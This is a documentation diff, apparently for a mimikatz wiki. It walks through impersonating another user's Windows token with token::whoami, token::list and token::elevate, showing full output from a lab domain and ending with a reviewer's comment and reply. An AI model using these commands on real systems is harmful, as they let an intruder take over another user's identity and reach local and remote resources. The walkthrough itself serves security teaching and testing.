mimikatz/modules/token/elevate.md

```diff
@@ -10,6 +11,93 @@
 
+## Impersonate Token in a New Thread
+
+List current token:
+
+```
+mimikatz # token::whoami
+ * Process Token : {0;000831c5} 3 F 2396391     SERVER01\tmassie    S-1-5-21-755659916-1915924768-2761631771-1001   (15g,24p)       Primary
+ * Thread Token  : no token
+```
+
+The output shows:
+
+- The primary (process) token belongs to the current user.
+- There is no impersonation (thread) token.
+
+List tokens of user to impersonate:
+
+```
+mimikatz # token::list /user:ffast
+Token Id  : 0
+User name : ffast
+SID name  :
+ 
+5332    {0;000563b2} 2 F 457263         winattacklab\ffast     S-1-5-21-1345929560-157546789-2569868433-1123   (15g,24p)       Primary
+4432    {0;000563b2} 2 F 2839551        winattacklab\ffast     S-1-5-21-1345929560-157546789-2569868433-1123   (15g,24p)       Primary
+668     {0;00050574} 0 D 329079         winattacklab\ffast     S-1-5-21-1345929560-157546789-2569868433-1123   (12g,24p)       Impersonation (Impersonation)
+668     {0;000563e4} 2 L 353269         winattacklab\ffast     S-1-5-21-1345929560-157546789-2569868433-1123   (15g,02p)       Impersonation (Impersonation)
+800     {0;000563e4} 2 L 456098         winattacklab\ffast     S-1-5-21-1345929560-157546789-2569868433-1123   (15g,02p)       Impersonation (Impersonation)
+920     {0;000563e4} 2 L 380750         winattacklab\ffast     S-1-5-21-1345929560-157546789-2569868433-1123   (15g,02p)       Impersonation (Impersonation)
+920     {0;000563e4} 2 L 387116         winattacklab\ffast     S-1-5-21-1345929560-157546789-2569868433-1123   (15g,01p)       Impersonation (Identification)
+920     {0;000563e4} 2 L 436160         winattacklab\ffast     S-1-5-21-1345929560-157546789-2569868433-1123   (15g,02p)       Impersonation (Impersonation)
+[...]
+```
+
+Use a primary token of the target user (one that is linked to a logonsession):
+
+```
+mimikatz # token::elevate /id:457263
+Token Id  : 457263
+User name :
+SID name  :
+ 
+5332    {0;000563b2} 2 F 457263         winattacklab\ffast     S-1-5-21-1345929560-157546789-2569868433-1123   (15g,24p)       Primary
+ -> Impersonated !
+ * Process Token : {0;000831c5} 3 F 2396391     SERVER01\tmassie    S-1-5-21-755659916-1915924768-2761631771-1001   (15g,24p)       Primary
+ * Thread Token  : {0;000563b2} 2 F 3874634     winattacklab\ffast     S-1-5-21-1345929560-157546789-2569868433-1123   (15g,24p)       Impersonation (Delegation)
+```
+
+The output shows:
+
+- The primary (process) token is still the same of the initial user. The `token::elevate` command will not change the primary token.
+- There is now a new impersonation (thread) token for the impersonated user. The impersonation level is `delegation`. It's therefore possible to use the token in a new thread and access local and remote resources.
+- It's not possible to start a new command (`misc::cmd`) as the impersonated user, because the impersonated token is an impersonation token and no process token.
```

Comment:
possible to give an example of how to impersonate a process token as well? Could be in an expandable block for instance, or later on in the page

Reply:
Added explanation to use the `token::run` module to create new processes using a token in 70be116 (sorry, the commit message is not so clear...).